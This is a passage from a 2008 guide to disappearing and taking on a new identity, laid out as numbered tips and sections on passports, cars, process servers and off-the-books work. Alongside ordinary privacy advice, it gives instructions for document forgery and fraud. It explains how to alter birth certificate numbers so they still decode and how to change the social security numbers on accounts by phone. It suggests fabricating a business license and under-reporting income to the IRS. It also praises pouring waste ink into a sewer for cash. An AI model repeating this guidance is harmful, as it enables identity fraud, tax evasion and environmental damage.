federal law to maintain a +"suspicious transaction" list where they record any strange +looking transactions. Always try to manipulate your financial +dealings so as to leave you with the most cash possible and +keep a substantial bankroll with you at all times. Keep some +other cash carefully hidden in your car and residence. +35. Pay your taxes. The best approach here is to pay taxes +on all the income you earn on your job. If the income you +claim seems about right for the job title you list, you have a +very small chance of being audited. The quick and easy IRS +form 1040-EZ as it' so simple there's very little for the IRS to +be suspicious about. Don't claim dependents you don't have +as this is the one area they might want to investigate. Keep +any deductions verifiable. This short form almost guarantees +you won't be audited. +How much tax you pay on any other income you might have +is up to you. This approach is more popular than you might +think. Any IRS auditor will tell you about the business owners +they audit who claim consistent business losses year after +year yet manage to live the lifestyle of the rich and famous. +One guy I used to know down south owned a gas station +and claimed a paltry salary of only $15,000 per year. +Yet he lives in a large comfortable house in a prestigious +older neighborhood, drives a new Lincoln, has an extensive +collection of rare coins and vacations in exotic foreign +© Copyright 2008, Ariza Research, All rights reserved - ABP - 119 - +Reproduction in any form is prohibited without written permission. + +places. Could it be that he's "skimming" cash from his cash +register each night? +36. Need help with your resume? Employment can be a +tricky subject for a recent identity-changers. The attached +resume report will help you cover unemployed periods and +past firings. +37. If you rent a place, quietly have the front door lock +changed. Don't tell the landlord. If you do they'll immediately +demand a copy of the new key. Just quietly change the +damned thing even though your lease will probably forbid it. +Call one of those mobile locksmith outfits and have them do +it one Saturday or Sunday night as late as possible. I once +rented a deluxe apartment in one of those modern high-rise +buildings. When I came home one night I found that my TV +was warm. Was someone watching my TV during the day +while I was at work? I set up a trap. +I left a copy of Penthouse magazine on my coffee table. I +made a small almost invisible pencil mark on the table top +and then laid the magazine down with it's left edge aligned +precisely on the line. The next day I returned to find my +magazine had magically moved several inches and was at a +different angle. Privacy is often very hard to come by when +you live in a rented apartment. +Landlords can be very sneaky and snoopy. Keep this in mind +and change that key! If your landlord informs you that they +know you changed the lock and now wants a copy of the +new key. Ask them "why did you need to get into my place?" +Tear their excuse apart and humiliate them if you can. If they +insist, provide them the new key. Let them test it and then +quietly change the lock once again several weeks later. He'll +get the idea. It's a war he can't win. Or if your apartment +allows pets, why not consider getting a rather territorial dog? +(Dobermans are a good choice) That might keep the +landlord away from your door. +38. If you suspect someone is entering your apartment +without your permission try this tactic. Take one of those little +six inch long flexible plastic rulers with you as you leave your +apartment. After you've closed your front door slide the ruler +in between the top of the door and the door jam. Push it in all +© Copyright 2008, Ariza Research, All rights reserved - ABP - 120 - +Reproduction in any form is prohibited without written permission. + +the way. You should just be able to see the end of the ruler +when you look up. Make a mental note of where it is relative +to the side of the door (or even mark it's location lightly with +a small pencil mark) +When you return home before you stick your key into the +lock - look up. Is the ruler still in just the right place? A snoop +won't see the ruler and will walk right in. One of two things +will happen. He will either not notice that the ruler has fallen +behind the door or if he's an observant snoop he'll see it and +want to return it to it's original place. But where exactly was +it? And best of all, he will know that you set a trap and he's +been busted! He won't be around again anytime soon. +39. Place sensitive documents and your cash in a high-quality lock +box and hide it very well. Buy another small safe or lockbox, put +junky documents in it and place it in an obvious place where a +thief would look. Many rich people buy two safes. +One they place in the wall in their living room behind a picture +where a burglar would be sure to find it while the other one is well +hidden in a dark corner of the basement. A thief will seldom take +the time to search for a second safe. They'll spend some time +working on the easy-to-find safe and never both to look further. +40. Experienced identity-changers advise recent changers have +cable installed and plan to spend most of your time indoors until +the new identity gets firmed up. This is a tricky phase and needs +special attention. Every time you step out your front door you're at +risk. There's no place like home. +41. Visitors to your home should look like they belong in your +circle of friends. A "normal" kind of guy wouldn't have unsavory +bikers and whores hanging around. Any guests should dress well +and blend in with the whole neighborhood. Unusual visitors get +noticed. Be a boring neighbor and be sure your guests are boring +too. +42. If you attempt to make a credit card purchase be sure - very +sure - that your card is good. If it's a secured card call the issuing +bank's toll-free number to be sure what your balance is just before +you leave the house. +Do the same with a regular credit card to be sure your remaining +balance will allow you to make purchases. If the card is refused +simply say "Oh that stupid bank, this is the second time this month +their computer system has been down!" +I recently had a brief conversation with a sales clerk at Sears who +© Copyright 2008, Ariza Research, All rights reserved - ABP - 121 - +Reproduction in any form is prohibited without written permission. + +told me that she gets a dozen or more card refusals a day (usually +for exceeding credit limits) but the clerks don't really trust the code +the cash register provides so will usually just hand the card back +with a smile (if you look like an normal person). Ten years ago a +refused card was a rare and embarrassing event. +43. Voter registration records are fully available for public review +and are sold on CD/ROMs for private investigators or anyone else +who has the purchase price. But keep in mind that with so few +people voting these days, it's very easy to get a voter registration +card in any name you want with almost no ID required. I went with +a friend recently who registered to vote in Colorado and didn't +even have to provide any ID at all. She just filled in a simple form. +44. Don't enter contests of any kind. Businesses build their mailing +lists by offering contest prizes. (many are never really awarded +anyway) +45. If you must get married, you might want to get hitched while +overseas. The Caribbean would be a good spot. +46. Be careful to avoid getting on junk mail lists. Don't' send in +warranty cards or answer consumer surveys. +47. Call your local phone company and sign up for caller ID +blocking if you didn't get the Radio Shack blocker box. +48. Don't register for and then use "preferred customer" cards. All +of the largest national book stores push these cards and now +many other retail outlets are using this ploy. Stay clear. If they get +pushy, just say that you live overseas so getting on their list is a +waste of time for you. +49. Don't contribute to charities or political campaigns. Once you +do either, you will get on a ton of mailing lists which can be +searched by interested parties. +50. Don't buy a boat, plane or other item that requires licensing. +51. Don't include you name on any corporate charters. If you must +set up a corporation, do it out of state. FYI - the best states for +incorporation are Nevada or Delaware. Most of the largest +companies in the US are Delaware corporations. Low taxation, +restricted access to corporate records and friendly courts are the +primary reasons. +52. Don't get behind on your bills. Pay everything on time if you +possibly can. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 122 - +Reproduction in any form is prohibited without written permission. + +53. Even with caller ID disabled and a radio shack blocker +installed, anyone you call using a toll free number can access your +number. So don't call toll free numbers unless you don't mind +them getting your number. +54. Don't use your bank ATM or debit card to purchase items +(unless it was issued by an offshore bank). Even off-shore based +credit cards are being monitored by the government these days. +55. Don't file for building permits as they are usually public +records. +56. Don't put any identifying information on your car. No +bumper stickers, window stickers or anything else that is +visible from outside the car. Well, maybe a small "just say no +to drugs" or "support your local police" bumper sticker +wouldn't hurt. +57. If you must get documents notarized, have it done in another +county. +58. Be careful when asked about your occupation. Don't just +automatically list your real field. Change it from time to time. I like +"engineer". It's harmless and very non-specific. "Administrative +Assistant" is another safe title. They won't raise any eyebrows. Or +just mumble "I work for Acme Furniture". People who have +working-class blue-collar jobs would rather say where they work +than admit they're really a janitor or garbage man. +59. Avoid having a garage sale as a local license or permit may be +required and it might feed the rumor mill to have all kinds of +personal items spread out in full view for everyone to see. +60. Be very careful what you say using a cordless phone. It would +be best to avoid using them altogether as even the best of them +isn't as secure as an old-fashioned corded phone. If you must +have one, be sure to buy the latest model that operates on a +higher frequency (900Mh) and uses multiple frequencies ("spread +spectrum"). A regular old corded phone is much more secure and +a whole lot cheaper. +61. Be sure to tell your family and friends to be careful with callers. +Investigators will use all sorts of ploys like "I'm an attorney that +needs to settle an estate and need to send John a certified check +for $25,000, can you help me find him?" They may even pose, as +an old friend who is dying and just wants one last chat before they +expire. Tell them to expect the unexpected and be very skeptical +of any calls. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 123 - +Reproduction in any form is prohibited without written permission. + +62. Avoid having an outstanding judgment listed against you. If +you lose a case in court, pay off the judgment as quickly as +possible. +63. Most banks request your mother's maiden name for security +purposes. Make up a new one and always avoid using your real +mother's maiden name. This tip is just good common-sense +security. Identity thieves usually assume that your mother's actual +maiden name was used on bank accounts. Don't make it easy for +them! +64. Use cash deposits when you open an account with a +videotape rental store. Give them as little information as possible. +If they ask for a larger deposit than usual - cough it up as it's a +sound investment in your privacy. +65. Avoid putting your name on your mailbox if you can. If you +must, write it sloppily in very small letters so that no one can read +it. Also use a single initial for your first name. "J" is the best first +initial for a man as it's so popular and difficult to guess (Jack, +John, Jim). +66. Consider having a phone line installed in a friends home and +then have calls forwarded using "call forwarding". +67. Avoid making personal calls or revealing anything personal on +a phone at work. In most states your employer can now legally +monitor your phone calls, Internet activity (stay away from internet +pornography) and email. +68. If you can, pay for prescription drugs with cash instead of +using insurance. Insurance claims are filed online and your new +address will appear in their database. Carefully control how much +information you provide your pharmacist. Various snoops have +access to these databases, which they can easily search. +69. Don't subscribe to new magazines. Subscription databases +are sold and shared all over the place. +70. You simply must sell your car and then buy a new one (with +cash) if you're to be a successful identity changer. If you keep +your present car and change your name on the title, anyone +looking for you can very easily run a check on your vehicle's +unique "Vehicle Identification Number - VIN" which will list all the +people who have ever owned the car. Both your old and new +names and addresses will appear right there together on one +sheet of paper. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 124 - +Reproduction in any form is prohibited without written permission. + +The best bet is to buy a car you wouldn't usually consider driving. +If you've always driven a flashy luxury car, perhaps this is the time +to buy a used Japanese sub-compact, or the other way around. +Experienced identity-changers report that their passion for a +particular make or model of car trips up far too many people. +71. If you must accept a check, instead of opening up a checking +account or going to one of those storefront "we cash any check" +places (stay away from them for sure as they enter all your +information in several different easily searched databases) you +simply take the check to the issuing bank and cash it there. +72. Successful identity-changers advise signing a new signature +until it becomes second nature. Some identity-changers have +accidentally signed their old names to an important document. +Only by repeating the signature over and over can it become +almost automatic. Sit with a pad signing over and over. Then +promptly throw the paper in the trash. You should practice signing +an illegible signature. It can come in handy when you sign for +deliveries. +73. If you need to take a drivers test to get a new drivers +license, borrow a car from one of those driving schools. (Pay +any fee they may ask) Do not take your car or a friend’s car, +as the testing officer will record the license number. +74. When you hit a new town start reading the local paper from +front to back. This will give you the lay of the land. In particular +notice where arrests are made. Avoid any bars or other +establishments where regular arrests take place. In particular +avoid any place where drug arrests are common. If the police +come up with wanted criminals each time they "sweep" a bar, +they'll get in the habit of running sweeps on a regular, random +schedule. +75. The best time to apply for a new social security card is March +or April. This is the peak period for applications as many +taxpayers discover that in order to claim their kids on their taxes, +they must first obtain social security numbers issued for them. +76. State issued birth certificates have a coded number on them. If +the number does not decode properly, you'll never get anywhere +with it. Just be careful to change only the last three or four digits +and leave the front of the code intact. If you change your state of +birth you'll have to alter the entire number. +1st Digit is always a one. +2nd and 3rd Digits are the state code number: (New York is 31) +4th and 5th Digits are last two number of year of birth (1979=79 +Last six digits - random sequence +© Copyright 2008, Ariza Research, All rights reserved - ABP - 125 - +Reproduction in any form is prohibited without written permission. + +77. Your new identity will become much firmer after the first year. +During the first year you have no real history, which will look +suspicious to anyone who checks on you. Submitting an +application for a passport, for instance, will be a problem if all of +the ID is relatively new. (Clerks are trained to spot fresh ID) A +driver’s license that is over a year old is best. +78. When you get a new phone number, insist on an unlisted +number. Be VERY careful about who you give this new number to. +Instruct those you do give the number to be very suspicious of +anyone who asks for the number. They will tell all sorts of lies to +get that number. Tell them to just take a message. If possible, do +not give the number out to anyone. +Also, most phone companies will now allow you to list your +number under another name for no additional charge (this is +usually cheaper than paying for a formal unlisted number). If they +allow it - use it. List your new number under something like "R. +Miller". +Also, when someone calls and asks for "Mr. Miller" you'll know +they're just another telemarketing fool. Some phone companies +now offer new privacy services. +It works like this: someone calls you. If their number is on your +"approved" list, the call rings through as usual. But if the number +isn't in your list, the call is forwarded to a voice mailbox where the +caller can leave you a personal message, if they want. The bottom +line is this: if the phone number they're calling from isn't on your +list - the call doesn't ring through. +79. Get an answering machine and use it. Screen all your calls +through it. Make a recording like "Hello, you have reached 555- +1234. Leave a message and I'll/We'll get back to you soon." Do +not mention even your first name. +Do not provide any other information. If you are single and living +alone say "we'll get back to you soon". If you are married or +shacking up, say "I'll get back to you soon". Why hand out +information you don't have to? +80. Avoid the temptation to live in a nice little rural area, or return +to your old stomping ground. You will never find anonymity in +Mayberry. (Remember how Sheriff Taylor and Deputy Barney Fife +used to sit around exchanging gossip all afternoon?) To avoid +undue gossip and attention, you'll need to live in at least a medium +© Copyright 2008, Ariza Research, All rights reserved - ABP - 126 - +Reproduction in any form is prohibited without written permission. + +sized city. Anyone trying to find you will call directory assistance +and ask for your listing. If there is no listing or your number is +unlisted the caller may ask for any other listings in that area with +the same last name. +If your last name is Przbylowicz - they will immediately call any +other Przbylowiczs in town. But if your last name is miller and you +live in Chicago - they will be confronted with a list of a several +hundred different Millers, which makes follow-up all but +impossible. +81. If a third party bill collector contacts you by phone or mail to +collect a debt, if the debt is real - pay it off immediately without any +further dealings. But if the debt isn't valid - immediately respond to +the letter by certified mail insisting that the debt is invalid. This will +cause the bill collector to stop and re-evaluate his plan. Always +deny everything. The bastards will either give up or at least the +tactic will postpone payment long enough for you to get the +required cash together. If the creditor employs the caller, don't try +this tactic. There's a great book on this subject entitled "The +Check is in the Mail". +82. If you are living with a child either your own or someone else's +be sure to carefully train them not to reveal information to anyone +either by phone or in person. Children are very trusting little souls +and many freedom lovers have been exposed by the comment of +an innocent child. +83. By using an official US post office box you will delay or +confuse anyone searching for you. I prefer the private corporate +boxes available from Mail Boxes Etc.. And other similar store front +operations. Either way these outfits will reveal your listed home +address to anyone who requests it so always be careful about +how much information you provide them. +Since the post office requires a fee for revealing this information, +requests must be mailed in and the information is not available +over the phone. Many bill collectors won't bother with a request. +84. Institutions of higher education are famous for giving out +personal information on their students. You should always list a +PO box address on any paperwork you give them. Many schools +will now allow alumni to change the official record number their +transcripts are recorded under from their social security number to +some other random figure. Identity thieves depend on the use of +your social security number for finding all kinds of records. +85. Libraries keep records on what books you read and new laws +require them to surrender those records to government snoops. +(Especially since the Patriot Act was passed.) Avoid getting a +© Copyright 2008, Ariza Research, All rights reserved - ABP - 127 - +Reproduction in any form is prohibited without written permission. + +library card in your new town. Or if you do feel the need, be +careful about the information you provide them. +86. It's extremely important that you keep your work phone +number to yourself. Do not give it out to anyone. Get a "stand- +alone phone mail" number instead. (For around $15 a month you +get your own new phone number which is not in any way +connected to your home phone. It operates just like an answering +machine and you pick up your messages by calling a number from +anywhere in the world and entering your secret password) +If an investigator stumbles on your work phone - you're finished. +They know you have to be there so they have you either to grab or +contact via phone whenever they want. Guard that work phone +like a hawk. If your number is discovered and you get a call, you'll +be forced to consider changing jobs. +87. When answering a suspicious phone call - call from a +payphone as far from your new home as possible. It's the only +way to be sure they won't get your number. But such a call would +reveal the general area you're living in. +88. If you have to make a payment to a collection agency - always +pay with a money order. Never, ever send them a personal check. +A check contains far too much personal information. Once they +have all that banking information they can cause you all sorts of +problems. +If you have an outstanding judgment against you out there +somewhere, the sum will soon vanish from your account without +any notice at all. +89. When you move, never file a change of address card with the +postal service. Instead notify any individuals that you want notified +(but keep this list to a bare minimum) +90. Your landlord can be a real problem for you. An investigator +who has your address but no phone can use the local tax records +to locate the owner of the property. They will contact them by +phone. Unfortunately most landlords are very open about sharing +information as they expect others to return the favor for them. +They have no reason to protect your privacy. +91. Since Sept. 11, 2001 the legal climate has changed. Under the +new rules the government can tap your phone or mail without +having to go to the bother of obtaining those pesky warrants. Our +constitutional rights are becoming but a distant memory. Read the +paper and keep yourself up-to-date on the latest developments or +your privacy will vanish. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 128 - +Reproduction in any form is prohibited without written permission. + +92. Be very suspicious of any unexpected checks you may receive +through the mail. If you can cash the check at the issuing bank but +be careful about giving them your home phone or address. If this +doesn't work for you, you can always endorse the check and use it +to pay a bill or debt owed to another party. But whatever you do, +don't endorse it and deposit it into any bank account you want to +keep private. Remember, the person who wrote the check will get +their cancelled check back with your account number and bank +name on the back. +The GED Follies +One of the really serious problems identity changers run into has +to do with educational qualifications. How can you take your +academic credentials with you without "blowing your cover?" +One quick way around the problem comes through the +popular GED system. You can earn GED certificates at +either the high school or college level. You register, take a +few classes and sit a test. If you score high enough in +enough different categories and you get your credit and +credential. +The best angle here is that the registration process is very +lax and doesn't require any really serious ID. Just be sure to +study up enough that you'll have no problem with the test. If +you can provide a copy of your DD-214 showing an +honorable discharge, many states will also issue you a state +high school diploma, which every employer in the state is +legally required to accept. +Bogus College Degrees +The following Internet outfits are well-known diploma mills and +should be avoided: +Columbia State University (Louisiana) +La Salle University (Louisiana) +Chadwick University (Alabama) +American State University (Hawaii) +American International University (Alabama) +Columbus University (Louisiana) +Monticello University (Kansas) +Frederick Taylor University (California) +Pacific Western University (Hawaii) +City University (California) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 129 - +Reproduction in any form is prohibited without written permission. + +Kennedy Western University (Hawaii) +Trinity University (Great Britain) +Most employers know these degrees are phony so don't +waste your money! +Avoiding Process Servers +Process servers can be very pesky indeed. Here are some +strategies for avoiding being served that others have found useful. +First it's important to know that process servers are extremely +underpaid which works to your advantage. The server is usually +private employed as a sort of independent entrepreneur. He pays +out of his own pocket for gas and other costs and then relies on +the fee he gets when a successful service is recorded to provide +him a living. +If you can frustrate a process server once or twice, he'll be much +less likely to pursue you again. Why waste more time and money +on someone who clearly understands the game and is not likely to +fall for his shallow tricks? +He'll quickly add you to his list of "problem customers" and move +on to more easily served suckers. +Let's start out with the basics. If some walks up to you and says in +a loud clear voice "are you (your real name)?", a common tactic is +to completely deny that you even know anyone of that name. Or +say "Oh him, yes I knew him but he's a nature photographer up in +Alaska now". +If your name is Smith, why not invest a few bucks in a front +doormat that says "Robinson" on it? Then mislabel your mailbox +with the same pseudonym. Though it's technically illegal for them +to do so, many process servers will open your mailbox and look at +your mail to see if you're residing at a particular residence. A +locked mailbox might be a useful option. +A process server cannot legally demand that you provide personal +ID. A short story: I moved to Florida and bought a nice +comfortable house. Little did I know that the previous owner was a +degenerate gambler who owned a lot of money to various people! +When I bought the house, the seller (Mr. Anderson) moved back +up north but refused to provide me with a forwarding address. +One day as I was settling down to a quiet evening when there's a +loud knock at the door. In my door stands a tall extremely hostile +young lady. She launches right into her threats "See here Mr. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 130 - +Reproduction in any form is prohibited without written permission. + +Anderson, we've waited long enough - we have to have something +on this account right now!" I mumbled "But I'm not Anderson". +She keeps right on with her attack without a pause "Let us not +play games here Mr. Anderson - I need a check and I want it +now!" I repeated "But I'm not Anderson". As she continued her +tirade, I slowly pulled out my driver’s license and held it up two +inches in front of her nose. She paused, stared at the driver’s +license and said, "Oh - I see". It stopped her dead in her tracks. +Never accept mail that requires a signature. Tell the postman that +you haven't heard from the addressee for over two years and that +the addressee is off chasing grizzly bears around Canada or got a +"calling" and is now an evangelist in Ethiopia or whatever. But +here is where the legal eagles get clever. Instead of sending a +suspicious looking letter, they will now send you a nice large +parcel. +Everyone likes to receive packages and most people are less +likely to be suspicious of a nice large box. Don't fall for the trap. +The box may contain a brick and a legal summons to appear. +If you are handed a certified or registered piece of mail, it might be +useful to know who sent it. Ask that the postman hand it to you so +you can read (and then memorize) the sender. Most mailmen will +cooperate as they hope you'll recognize the sender and agree to +receive the letter. This info can give you a valuable insight into +who is on your trail. +Another trick is to send the legal document through the regular +mail. Be careful what you open. Some have even made the +document envelope look as though it contains a check. This can +be quite tempting. The best strategy is to purchase a rubber +stamp that says "addressee unknown - not at this address - no +forwarding address on file". Stamp any suspicious mail with it and +return it to sender. +Working "Off the Books" +Unless they have accumulated a large bankroll, most new +successful identity-changers have to, for a time, make a living "off +the books". If you can do home improvement work, get an +answering service phone number and a commercial post box (in a +nice section of town) and have a business card printed up so you +look legit. +Offer a one third off discount for cash up front. If your lack of +references is a problem, do the rounds of the local churches (or +smaller charities) and offer your services for next to nothing. After +© Copyright 2008, Ariza Research, All rights reserved - ABP - 131 - +Reproduction in any form is prohibited without written permission. + +you have satisfied them with the quality of your work, word of +mouth will send plenty of work your way. (People are greedy and +just LOVE a good bargain - particularly one that breaks the rules) +And you'll be getting a very valuable reference from the clergy in +the process. +You may even be offered an "off the books" job. Don't be +surprised by this, as even the larger corporations love a bargain +(and are disgusted with government regulation, taxes and unions). +While on the job, try to keep your appearance as professional as +possible. +Be completely honest with your customers as the name of the +game here is trust. Do not ask for salary advances as that +involves trust, which has not yet been established. Small jobs are +the best bets especially early on. Have the customer purchase +building materials if they're willing. They'll be much more willing to +buy materials then to hand over hard cash to a stranger. +Avoid the subject of building permits but if a customer insists on +one, have them do the application. On a larger job be sure to +collect your pay at intervals so as to keep your cash flow in the +black. Don't ever let a single job consume all your time and +capital, as there is always the chance you won't get paid off in the +end. +Some underground workers prefer to file their taxes and report a +portion of their real earnings and skim the rest in cash while others +live entirely underground. As always the choice is yours. But +whatever you do be careful about one detail. When you fill out +your tax forms there is a nasty trap that you should know about. +That silly little box that asks for your profession or job title can be +a killer. If you list your job title as "Contractor" or "Carpenter" you +may run into problems. +The IRS has a hit list of targeted professions, which include all +those that might have hidden cash incomes or unreported tip +income. "Entertainer" is another title to avoid. Under new IRS +guidelines, they will only launch a serious investigation when they +can be sure there is enough money involved to make it profitable +for them. +Even high tech workers can play at this game. One smart fella I +know waltzed into a large discount electronics store and offered +the sales clerks a 15% cash commission on any computer +installation/programming customers they might send his way. +Each new computer customer was asked if they could use some +on-site assistance. After a few test jobs, the guy got so much work +he had to hire other "off the books" workers to keep up with the +backlog. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 132 - +Reproduction in any form is prohibited without written permission. + +There are companies who have materials they badly need to +dispose of. The official disposal programs charge enormous fees +to government approved disposal firms who collect and bury the +stuff in government approved underground vaults. +But despite all the rules, many institutions are seeking a less +expensive solution. Someone who could pick up a few drums of +the stuff several times a week and make it disappear with no +questions asked could make some serious money very quickly. +Where the stuff ends up is of no interest to them. +Banks, for instance, use computerized machines that spray +fluorescent and black inks on the back of our checks during their +processing. Unfortunately for them the machines produce a +steady flow of waste ink. One guy would pick the stuff up each +Tuesday and Thursday evening (around 9pm was the best pickup +time as few people are around then) and run it out to a suburban +industrial park that had a large sewer drain located in a poorly +lighted area. +Five hundred bucks cash for five hours work and the stuff wasn't +really all that dangerous. Deals like this are around if you can +find them. And when you satisfy one customer don't be surprised if +several more look you up. +Surfing the Web +If you look around the web you’ll find several pages that provide +access to the social security administrations death database +(SSDI- Social Security Death Index) I’d provide you with the +current URL but it’s constantly changing so it’s best that you use +one of the search engines to locate it yourself. +If you look at the private investigator pages you'll stumble on +pages that provide a free social security number lookup feature. +You enter the SSN and it gives you the state and year of issue +and confirms that the number was officially issued. +You do not get a name or any other info unfortunately. This is the +same check most banks use so this information can be quite +valuable for your purposes. +There's also the new Mormon family research database at +www.familysearch.org. You'll find a ton of dead people (and many +that are still alive!) listed in their extensive database. I was +shocked to find myself and both of my parents (both still living) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 133 - +Reproduction in any form is prohibited without written permission. + +included in their listings. +But be warned that you may have to verify the information you find +here. Well-meaning individuals that sometimes get their facts +wrong have entered much of it. I'd guess that between 5 and 10% +of the information is incorrect so be careful. +Passports +Since a US passport is issued by an agency of the US federal +government, it's the most influential and widely respected form of +ID an American can carry. (If you don't believe this try getting back +into the US after an overseas trip with your drivers license and see +how far you get.) A US passport is accepted almost everywhere. +I've received dozens of reports from readers that the US State +Department no longer bothers to verify the existence of a birth +certificate in a vital records office before issuing a passport. +And the US passport is a very interesting form of ID. It's the single +most credible form of ID even though it contains very little +information. Yes it does have your picture (digitized so it can't be +easily altered) and your name and birth date. No social security +number, no address. Anyone who claimed to have lived overseas +would have a current US passport in their pocket. For this reason +you should obtain one and keep it with you at all times. It's a very +useful kind of ID that doesn't reveal too much information. +This tip was recently provided by an identity-changer in New +Jersey. To escape an unpleasant situation, this lady along with +several friends had booked an extensive European tour through a +local travel agency. About a month before her departure she +stopped by her local post office to pick up a passport application. +Suddenly she remembered her mother telling her some years +back that, due to her father's strict religious beliefs, her birth was +never properly registered. She feared that since she had no birth +certificate on file - she probably wouldn't be able to get the +passport she would need for her trip. +She quickly phoned the US Department of State in Washington to +see what could be done. She was told that her situation was not +unusual. (Again, a substantial percentage of the people you see +walking down the street have never had a birth certificate entered +into the official files) All she had to do was request a copy of her +birth certificate from the proper vital records office. +The state department would perform a search and, of course, +would find nothing. They would then send her a form indicating +that no birth certificate had been found. (This is usually a very +© Copyright 2008, Ariza Research, All rights reserved - ABP - 134 - +Reproduction in any form is prohibited without written permission. + +simple photocopied form with a large "X" in a box next to the +relevant statement) +According to State Department rules this document would prove +that she had made an official attempt to obtain her birth certificate +and that additionally no birth certificate was on record. The State +Department bureaucrats will accept the official rejection form in +place of an actual birth certificate! She did as they requested and +got her passport right on schedule as promised. The forms seem +very hard and fast as to which documents they'll accept but in +reality there's a lot of flexibility in their requirements. +Passport Update +According to a recent news report the US immigration and +naturalization service (INS) is having a hard time keeping +illegal aliens, drug dealers and terrorists out of the country. +In December 1999 alleged terrorist Ahmed Ressam was +arrested when he attempted to enter the US using false +travel documents. Though they stopped him, INS officials +have admitted that controlling who gets in and who doesn't is +becoming a very difficult challenge. +During the year 2004 the government counted over 500 +million individuals who entered the US through 200 points of +entry and if even two percent of them did so illegally, that +adds up to over 10 million people! +First there is the issue of passport forgery. For around +$5,000 an expertly altered US passport can be purchased +overseas. Though the US Department of State is now +issuing a new higher-tech passport. (Which includes new +high tech security features including a digitized photo that's +bonded right into the page rather than the much easier to +alter stuck-on photo) Passports issued through US +embassies abroad continue to use the more vulnerable +stuck-on photos. +And to make it even more difficult for the government - the +US now admits citizens from 29 different countries without a +visa. So all an illegal has to do is create a forged birth +certificate from one of these approved countries and then +obtain either a genuine or an altered passport from that +country. This is exactly what Ahmed Ressam did. France +was the country he chose. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 135 - +Reproduction in any form is prohibited without written permission. + +According to a top INS official - "for the vast majority of +passport applications in Canada and the United States, they +do not do background checks or even check the birth +certificate authenticity." +Since US birth certificates are issued in over 1,000 different +formats at 7,000 different offices, it's very difficult to be sure +they're dealing with a genuine document. US department of +state officials used to contact the office that issued the birth +certificate to verify it's authenticity but unfortunately +insufficient funding has kept these offices ridiculously low- +tech so verification can take weeks or even months. (Clerks +have to manually search through huge drawers of paper +documents) +This is far too slow to allow efficient verification. At some +point in the future this entire system will be fully automated +and will allow fast online verification, but for the foreseeable +future forgery is an effective option. And given the huge +increase in the number of people traveling these days, the +issuing authorities are feeling a bit swamped. +Though I've received reports that US citizens have been +arrested for past crimes when they attempted to enter the +US, highly placed state department officials tell a different +story. They report that the department uses two different +databases when they look you up at passport control at an +entry point. Neither talks to the other. And neither one talks +to the federal NCIC computer where all the arrest warrants +reside. The INS commissioner has promised to correct these +deficiencies but progress seems painfully slow. +Here is how bad the situation really is. In June of 1999 an +alleged Mexican murderer, Angel Reyes-Resendiz was held +and then released by the INS even though the FBI was +conducting a nationwide manhunt for him! (he was number +three on the FBI's ten most wanted criminals list!) Talk about +one hand not knowing what the other is doing! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 136 - +Reproduction in any form is prohibited without written permission. + +Buying a Car +Never buy a car and have it registered using your home +address and phone number. Instead you'll need to cover +your tracks. One easy way is to buy a used car and have a +business name listed on the bill of sale. This should allow +you to register the tags and title in the business name. If +you're asked for a business license, there have been those +who have fabricated one using one they found on the web. If +it's from out of state, it will be very difficult to trace and verify. +If you have a nice employee ID, it will help smooth the path. +Today most new car dealerships are eager to lease cars +rather than sell them outright. They make more money with +leasing because they know you have to come back and +lease another every three years or so. Leasing is seldom a +good deal except for those who have to have the latest +model or for small businesses who can write the vehicle's +costs off on their taxes. Either way it shouldn't be too difficult +to lease a new car in a business name. +Of course you'll be asked to sign a personal guarantee on +the financing but that's par for the course. +It almost goes without saying that you should change the +kind of car you usually drive. If you're addicted to little red +sports cars, now would be the time to buy a big blue Ford. +Stay away from your usual kind of automobile. +Skip tracers and other snoops are in the habit of tracing +vehicle transfers. You transfer your title from Virginia to +Colorado and all your hard work goes down the drain as the +transfer is fully documented in a public record that is easily +searched. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 137 - +Reproduction in any form is prohibited without written permission. + +Rookie Mistakes +Here are some basic mistakes many freedom-lovers have +made that "blew their cover". Avoid these like the plague. +Pre-vanish Planning +- Need to do some surfing to get your facts together before +departure? Do that surfing at an Internet cafe or at the +library. Don't do it from your home PC. +- Don't make calls related to your coming departure on your +home phone. Instead purchase a prepaid cellular phone. +Only make your usual calls on your home phone and make +all calls relating to your upcoming vanishing act on the +cellular. When you're ready to take the plunge, crush the +cellular phone completely and discard it and buy another +when you arrive in your new city. Do not give your new +prepaid cell phone number to anyone. All you have to do is +make a single phone call from your home phone (or a +relative's phone) to your new city and you will have provided +any snoops with a 24 carat solid gold link which they will use +to blow your cover. +- Do not call your old doctor from your new location to +request medical records. If you can, abandon your old +records but if you must have them, tell your doctor you're +leaving town and aren't sure where your employer will +eventually place you so you need to take the most relevant +records with you. If you have to promise to return them, do +so. +- Never attempt to change the address on a magazine +subscription from your old address to your new one. Sounds +stupid but many a vanisher has been tripped up in just this +way. +- Do not rush your pre-vanish planning. Take at least several +months. The longer the better as long as you don't forge +links between your old and new selves. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 138 - +Reproduction in any form is prohibited without written permission. + +- Confide in no one, no one at all. Do not change your daily +routine. Go about your business as normally as you can. Do +not alter your personal relationships. These should also +appear normal. +- You can call accounts up and "correct" the social security +number they have on file. Confirm that the number is correct +and use the occasion to change the number. Don't change +the first three numbers however (unless you want to appear +to have come from some other distant state). You can load +account files with misinformation with a series of phone calls. +- If you're really serious about vanishing, you can setup a +foreign mail forwarding service right on the Internet. Just do +a search for "foreign mail forwarding" on google and select +one. Unfortunately their services don't come cheap but you'll +have an address that is entirely untraceable. This address +can then be used as an intermediary address between you +and your offshore bank. +- Go to www.jfax.com and get an online fax number. For a +few bucks you get an untraceable fax phone number. When +you get a fax they send you an email notice. Nice service +and it's secure. Give them junk info or misinformation when +registering. Give them only a Yahoo, Hotmail or Ziplip email +address. +- When you order your prepaid cellular phone, ask if they will +issue you a number in some distant area code. Many cell +companies will offer this service. If they charge a few more +bucks - cough it up as it's a bargain. +- Once in your new area, demolish your cellular phone every +two months or so and replace it preferably with one with +some other area code. Your calling location will remain a +mystery. 